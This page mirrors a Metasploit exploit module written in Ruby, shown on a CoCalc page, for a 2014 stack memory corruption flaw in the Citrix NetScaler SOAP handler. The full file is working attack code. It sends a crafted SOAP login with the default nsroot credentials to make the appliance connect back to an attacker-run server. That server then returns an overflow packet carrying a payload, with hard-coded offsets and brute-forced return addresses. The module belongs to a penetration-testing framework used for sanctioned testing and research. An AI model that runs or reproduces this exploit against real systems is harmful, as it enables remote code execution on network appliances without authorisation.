Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::Remote::TcpServer

11
  include Msf::Exploit::Brute

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Citrix NetScaler SOAP Handler Remote Code Execution',

18
        'Description' => %q{

19
          This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.

20
          The vulnerability exists in the SOAP handler, accessible through the web interface. A

21
          malicious SOAP requests can force the handler to connect to a malicious NetScaler config

22
          server. This malicious config server can send a specially crafted response in order to

23
          trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary

24
          code with the privileges of the web server running the SOAP handler. This module has been

25
          tested successfully on the NetScaler Virtual Appliance 450010.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'Bradley Austin', # Vulnerability Discovery and PoC

30
          'juan vazquez' # Metasploit module

31
        ],

32
        'References' => [

33
          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']

34
        ],

35
        'Payload' => {

36
          'Space' => 1024,

37
          'MinNops' => 512,

38
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

39
        },

40
        'Arch' => ARCH_X86,

41
        'Platform' => 'bsd',

42
        'Stance' => Msf::Exploit::Stance::Aggressive,

43
        'Targets' => [

44
          [

45
            'NetScaler Virtual Appliance 450010',

46
            {

47
              'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.

48
              'Offset' => 606,

49
              'Ret' => 0xffffda94, # Try before bruteforce...

50
              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the

51
              # process being exploited is an apache child, the bruteforce attack works fine

52
              # here.

53
              'Bruteforce' =>

54
                {

55
                  'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack

56
                  'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack

57
                  'Step' => 256

58
                }

59
            }

60
          ],

61
        ],

62
        'DisclosureDate' => '2014-09-22',

63
        'DefaultTarget' => 0,

64
        'Notes' => {

65
          'Stability' => [ CRASH_SAFE, ],

66
          'Reliability' => [ REPEATABLE_SESSION, ],

67
          'SideEffects' => [ IOC_IN_LOGS, ]

68
        }

69
      )

70
    )

71


72
    register_options(

73
      [

74
        OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),

75
        OptAddress.new('SRVHOST', [true, 'The local host to listen on. This must be an address on the local machine reachable by the target', ]),

76
        OptPort.new('SRVPORT', [true, 'The local port to listen on.', 3010])

77
      ]

78
    )

79
  end

80


81
  def check

82
    res = send_request_cgi({

83
      'method' => 'GET',

84
      'uri' => normalize_uri(target_uri.path)

85
    })

86


87
    if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m

88
      return Exploit::CheckCode::Detected

89
    end

90


91
    Exploit::CheckCode::Unknown

92
  end

93


94
  def exploit

95
    if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])

96
      fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')

97
    end

98


99
    if check != Exploit::CheckCode::Detected

100
      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")

101
    end

102


103
    start_service

104


105
    if target.ret

106
      @curr_ret = target.ret

107
      send_request_soap

108
      Rex.sleep(3)

109


110
      if session_created?

111
        return

112
      end

113
    end

114


115
    super

116
  end

117


118
  def brute_exploit(addrs)

119
    @curr_ret = addrs['Ret']

120
    send_request_soap

121
  end

122


123
  def send_request_soap

124
    soap = <<~EOS

125
      <?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">

126
      <SOAP-ENV:Body>

127
      <ns7744:login xmlns:ns7744="urn:NSConfig">

128
      <username xsi:type="xsd:string">nsroot</username>

129
      <password xsi:type="xsd:string">nsroot</password>

130
      <clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>

131
      <cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>

132
      <ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>

133
      </ns7744:login>

134
      </SOAP-ENV:Body>

135
      </SOAP-ENV:Envelope>

136
    EOS

137


138
    print_status('Sending soap request...')

139


140
    send_request_cgi({

141
      'method' => 'POST',

142
      'uri' => normalize_uri(target_uri.path),

143
      'data' => soap

144
    }, 1)

145
  end

146


147
  def on_client_data(cli)

148
    print_status("#{cli.peerhost} - Getting request...")

149


150
    data = cli.get_once(2)

151
    req_length = data.unpack('v')[0]

152


153
    req_data = cli.get_once(req_length - 2)

154
    unless req_data.unpack('V')[0] == 0xa5a50000

155
      print_error("#{cli.peerhost} - Incorrect request... sending payload anyway")

156
    end

157


158
    print_status("#{cli.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")

159


160
    my_payload = Rex::Text.pattern_create(target['Offset'])

161
    my_payload << [@curr_ret, target['RwPtr']].pack('V*')

162
    my_payload << payload.encoded

163


164
    pkt = [my_payload.length + 6].pack('v')

165
    pkt << "\x00\x00\xa5\xa5"

166
    pkt << my_payload

167
    cli.put(pkt)

168
    cli.disconnect

169
  end

170
end

171


172